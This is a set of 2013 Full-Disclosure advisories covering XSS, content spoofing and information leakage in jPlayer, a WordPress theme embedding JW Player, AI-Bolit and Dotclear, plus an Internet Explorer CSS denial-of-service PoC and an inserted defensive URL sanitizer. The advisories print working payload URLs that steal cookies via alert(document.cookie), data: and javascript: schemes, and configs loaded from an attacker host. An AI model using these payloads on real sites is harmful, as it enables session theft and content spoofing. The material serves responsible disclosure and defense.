2013.04.21 - informed developers of MP3-jPlayer, Haiku minimalist audio player and WP jPlayer (of the five developers only these three had contact information).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Vulnerabilities in jPlayer
Hello list! I want to inform you about multiple vulnerabilities in jPlayer. These are Cross-Site Scripting and Content Spoofing vulnerabilities in jPlayer, which is used at tens of thousands of web sites and in multiple web applications.

- Affected products: -

Vulnerable are versions before jPlayer 2.2.23. Version 2.2.23 and the last released version 2.3.0 are not vulnerable to the mentioned XSS, except CS via JS and XSS via JS callbacks. Also there are other bypass methods which work in version 2.3.0, but the developers haven't fixed them besides the attack via alert. I wrote to the developers about that already in March and reminded them again. So wait for a new version with fixes for these vulnerabilities.

- Affected vendors: -

Happyworm
http://www.jplayer.org

-- Details: --

Cross-Site Scripting (WASC-08):

Different versions of jPlayer have different XSS vulnerabilities.

0.2.1 - 1.2.0:
http://site/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

2.0.0:
http://site/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

2.1.0:
http://site/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

In version 2.2.0 these XSS vulnerabilities were fixed (the developers were informed about the hole in the jQuery parameter and made a fix which protected from both attacks). But Malte Batram (in version 2.2.19) and I (in version 2.2.20) found new ones.

2.2.0 - 2.2.19 (and previous versions):
The attack works in Firefox (all versions, and browsers on the Gecko engine), IE6 and Opera 10.62.
http://site/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

2.2.20 - 2.2.22 (and previous versions):
http://site/Jplayer.swf?jQuery=alert&id=XSS

Content Spoofing (WASC-12):

It's possible to conduct CS (inclusion of audio/video files from external resources) via JS and XSS via JS callbacks. This requires an HTML Injection vulnerability at the site. The attack is similar to the XSS attacks via callbacks in JW Player (http://securityvulns.ru/docs28176.html).

Because this attack vector requires a separate vulnerability at the target site to conduct CS and XSS attacks using jPlayer, the developers didn't do anything to fix it. The same as the developers of JW Player. So protection from this attack scenario lies solely on web site owners.

Timeline:

2013.01.31 - found vulnerabilities in jPlayer at multiple web sites (in version 2.1.0).
2013.03.14 - announced on my site.
2013.03.19 - informed developers.
2013.03.19-30 - discussed with the developers different vulnerabilities in different versions of jPlayer and at their sites.
2013.03.21 - developers were informed by Malte Batram about the XSS hole in 2.2.19.
2013.03.21 - developers fixed Malte's XSS hole in 2.2.20 in github (CVE-2013-1942).
2013.03.22 - informed developers about the new hole, which works in 2.2.20.
2013.03.23 - sent details of the new XSS, warned about the possibility of other XSS attacks and gave recommendations about properly fixing the XSS to prevent any future XSS.
2013.03.30 - reminded developers about the last hole.
2013.04.12 - developers fixed my XSS hole in 2.2.23 in github.
2013.04.20 - developers released jPlayer 2.3.0 (http://www.jplayer.org/2.3.0/release-notes/) and informed me.
2013.04.20 - disclosed on my site about jPlayer (http://websecurity.com.ua/6379/).
2013.04.21 - tested version 2.3.0 and found that the developers fixed only one attack vector and didn't make a complete fix, as I recommended in March, so I reminded them and sent them examples of two new XSS.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Multiple vulnerabilities in Colormix theme for WordPress
Hello list! Last year I disclosed vulnerabilities in JW Player and in RokBox, which were fixed by the developers: the JW Player developers fixed one hole and promised to fix the others later, and RokBox fixed all holes (but it was questionable how they fixed the holes related to JW Player). In December I wrote about 47 of RocketTheme's themes for WordPress (which contain RokBox). Besides their themes, in December I found similar vulnerabilities in multiple themes by other developers (including custom themes).

Now I'll inform you about multiple vulnerabilities in the Colormix theme for WordPress. These are Cross-Site Scripting, Content Spoofing and Full path disclosure vulnerabilities.

- Affected products: -

Affected are all versions of the Colormix theme for WordPress. Other themes of this developer can be vulnerable as well.

- Affected vendors: -

Wordpress Themes Park
http://www.wordpressthemespark.com

-- Details: --

XSS (WASC-08):

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Content Spoofing (WASC-12):

In the parameter file, both video and audio files can be set. The swf-file of JW Player accepts arbitrary addresses in the parameters file and image, which allows spoofing the content of the flash, i.e. by setting addresses of video (audio) and/or image files from another site.

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFF&screencolor=0xFF
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg

Content Spoofing (WASC-12):

The swf-file of JW Player accepts arbitrary addresses in the parameter config, which allows spoofing the content of the flash, i.e. by setting the address of a config file from another site (the parameters file and image in the xml-file accept arbitrary addresses). For loading a config file from another site, that site needs to have crossdomain.xml.

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml

File 1.xml:
1.flv
1.jpg

Content Spoofing (WASC-12):

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

Full path disclosure (WASC-13):

There is FPD in the folder http://site/wp-content/themes/colormix/ in index.php and in many other php-files of the theme.

Timeline:

2012.05.29 - informed developers of JW Player.
2012.08.18 - informed developers about new holes in JW Player Pro.
2012.08.28 - informed developers of Rokbox.
2012.12.14 - disclosed on my site about Rokbox.
2012.12.23 - disclosed to the lists the first part of vulnerable themes by RocketTheme for WordPress.
2012.12.30 - disclosed to the lists the second part of vulnerable themes by RocketTheme for WordPress.
2013.04.18 - disclosed on my site about the Colormix theme (http://websecurity.com.ua/6457/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
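Every vector in this advisory is a URL-valued flashvar handed to jwplayer.swf unchecked: aboutlink with a data: URL (the base64 above decodes to a script tag) for the XSS, and file, image and config pointing at another host for the content spoofing. The check below is an added example, not code from JW Player, RokBox or the Colormix theme. It parses each such value with the WHATWG URL parser, accepts only http: and https: (which drops data: and javascript: whatever whitespace or case surrounds the scheme), and optionally restricts the origin, which is what blocks a config file from another site regardless of that site's crossdomain.xml. The page URL, origin list and inputs are hypothetical.

```javascript
// Added example; not code from JW Player, RokBox or the Colormix theme. A site
// that embeds the player should run every URL-valued flashvar (file, image,
// config, aboutlink) through a check like this before handing it to the SWF.
// Origins, paths and inputs below are hypothetical.

const ALLOWED_SCHEMES = new Set(['http:', 'https:']);
const URL_PARAMS = ['file', 'image', 'config', 'aboutlink'];

// Return the normalized absolute URL when it is acceptable, otherwise null.
// `base` is the embedding page's URL (resolves relative values like "1.flv");
// `allowedOrigins` lists the origins media/config may come from, or null to
// accept any http(s) origin. The WHATWG parser already trims leading and
// trailing whitespace and removes embedded tabs/newlines, so "java\tscript:"
// and " javascript:" are classified by their real scheme, not by a prefix test.
function safePlayerUrl(value, base, allowedOrigins) {
  if (typeof value !== 'string') return null;
  let url;
  try {
    url = new URL(value, base);
  } catch (_) {
    return null;                                       // unparsable: reject
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) return null; // data:, javascript:, vbscript:, file:
  if (allowedOrigins && !allowedOrigins.includes(url.origin)) return null;
  return url.href;
}

// Filter a flashvars object: URL parameters that fail the check are dropped
// rather than passed through; every other parameter is kept as is.
function sanitizeFlashvars(params, base, allowedOrigins) {
  const out = {};
  for (const [key, value] of Object.entries(params)) {
    if (!URL_PARAMS.includes(key)) {
      out[key] = value;
      continue;
    }
    const safe = safePlayerUrl(value, base, allowedOrigins);
    if (safe !== null) out[key] = safe;
  }
  return out;
}

// Hypothetical embedding page and the advisory's parameters; the aboutlink
// value decodes to <script>alert(document.cookie)</script>.
const PAGE = 'http://site/wp-content/themes/colormix/';
const ATTACK = {
  abouttext: 'Player',
  aboutlink: 'data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+',
  file: 'http://attacker/1.flv',
  image: '//attacker/1.jpg',
  config: 'http://attacker/1.xml',
};

console.log(sanitizeFlashvars(ATTACK, PAGE, ['http://site']));
```

With the origin list set to the site itself, only abouttext survives from the attack set; a legitimate relative value such as file=1.flv resolves to the theme folder and passes. Leaving allowedOrigins null still stops the aboutlink XSS but keeps the content spoofing possible, so the origin restriction is the part that matters for the second and third findings above.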
[Full-disclosure] Vulnerabilities in AI-Bolit
Hello list! These are Brute Force and Information Leakage vulnerabilities in AI-Bolit. This is a security web application.

- Affected products: -

Vulnerable are all versions of AI-Bolit. In version 20121014 the filename format was changed (with date and time added), which is not enough to protect from guessing, as I stated to the developer. He promised to fix these vulnerabilities. Following my recommendations, in version 20130201 the developer added protection against Information Leakage (forbade indexing of reports by search engines and added a random number to the filename). But the software is still vulnerable to Brute Force.

-- Details: --

Brute Force (WASC-11):

http://site/ai-bolit.php?p=1

Information Leakage (WASC-13):

http://site/AI-BOLIT-REPORT.html
http://site/AI-BOLIT-REPORT--.html (since version 20121014)

Leakage of reports with stats and FPD. Also these reports are indexed by search engines. If backdoors on the site are mentioned in the report, then after getting access to the report it's possible to learn about the backdoors and hack the web site using them.

Timeline:

2013.01.22 - announced on my site.
2013.01.22 - informed developer about vulnerabilities.
2013.02.01 - developer released a new version with protection against Information Leakage.
2013.04.13 - disclosed on my site (http://websecurity.com.ua/6271/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] XSS and CS vulnerabilities in Dotclear
Hello list! These are Cross-Site Scripting and Content Spoofing vulnerabilities in Dotclear.

CMS Dotclear has three vulnerable flash-files: swfupload.swf, player_flv.swf and player_mp3.swf.

File swfupload.swf is Swfupload. I wrote about vulnerabilities in Swfupload in November 2012 (http://securityvulns.ru/docs28759.html).
SecurityVulns ID: 12719
CVE: CVE-2012-3414

File player_flv.swf is FLV Player. I wrote about vulnerabilities in FLV Player in August 2011 (http://securityvulns.ru/docs26894.html).
SecurityVulns ID: 11877

File player_mp3.swf is an mp3 player similar to FLV Player (made by the same developer).

- Affected products: -

Vulnerable are Dotclear 2.4.4 (and partly 2.5) and previous versions.

In Dotclear 2.5 the developers fixed the vulnerabilities, but not effectively:
1) all three vulnerable flash-files still exist in the engine (so one should not take them from the repository or from web sites for use in own projects, since these are vulnerable versions of the flashes);
2) the developers replaced swfupload.swf in Dotclear 2.5 with a previous version, but this one is still vulnerable to all XSS and CS holes;
3) the forbidding of direct access to the flash-files (via .htaccess), meant to prevent the use of their vulnerabilities, works only in Apache, but not in other web servers (so web sites on them are vulnerable).

-- Details: --

Cross-Site Scripting (WASC-08):

http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Cross-Site Scripting (WASC-08):

http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

http://site/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)

http://site/inc/swf/player_flv.swf?configxml=http://site/attacker.xml

File xss.xml:

http://site/inc/swf/player_flv.swf?config=http://site/attacker.txt

File xss.txt:
onclick=javascript:alert(document.cookie)
ondoubleclick=javascript:alert(document.cookie)

The code will execute after a click. It's strictly social XSS.

Content Spoofing (WASC-12):

http://site/inc/swf/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E

It's possible to inject text, images and html (e.g. for link injection).

http://site/inc/swf/player_flv.swf?configxml=http://attacker/1.xml
http://site/inc/swf/player_flv.swf?config=http://attacker/1.txt
http://site/inc/swf/player_flv.swf?flv=http://attacker/1.flv
http://site/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml
http://site/inc/swf/player_mp3.swf?config=http://attacker/1.txt
http://site/inc/swf/player_mp3.swf?mp3=http://attacker/1.mp3

Timeline:

2013.01.10 - announced on my site.
2013.01.14 - informed developers about vulnerabilities in all three flashes.
2013.03.16 - Dotclear 2.5 released.
2013.04.10-12 - wrote 4 additional letters to the developers with reminders, drawing attention to the ineffective fixing of the holes and persuading them to fix the holes correctly.
2013.04.12 - disclosed on my site (http://websecurity.com.ua/6255/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] DoS vulnerability in Internet Explorer (access violation)
Hello list! I want to warn you about a Denial of Service vulnerability in Internet Explorer. It is an access violation. I made the exploit and tested this vulnerability on 13.02.2013. This exploit is based on a video by TheSecuritylab for IE7. As I tested, it also works in IE6 and IE8.

- Affected products: -

Vulnerable are Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.00.5730.13), Internet Explorer 8.0 (8.00.6001.18702) and previous versions of these browsers. IE9 is not affected (Microsoft fixed this hole).

-- Details: --

Denial of Service (WASC-10):

The browser crashes on recursive inclusion of a css-file. It happens due to an access violation (aka segmentation fault) in iexplore.exe. Also it's important for the crash that the css-file has a short name. For the exploit to work in IE6 the page needs to be refreshed.

PoC / Exploit:

IE_DoS_Exploit.html

dos.css:

@import url("dos.css");
@import url("dos.css");
@import url("dos.css");
@import url("dos.css");
@import url("dos.css");

Video PoC:

Internet Explorer CSS Denial of Service Vulnerability
http://www.youtube.com/watch?v=eihStRWnrX4

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua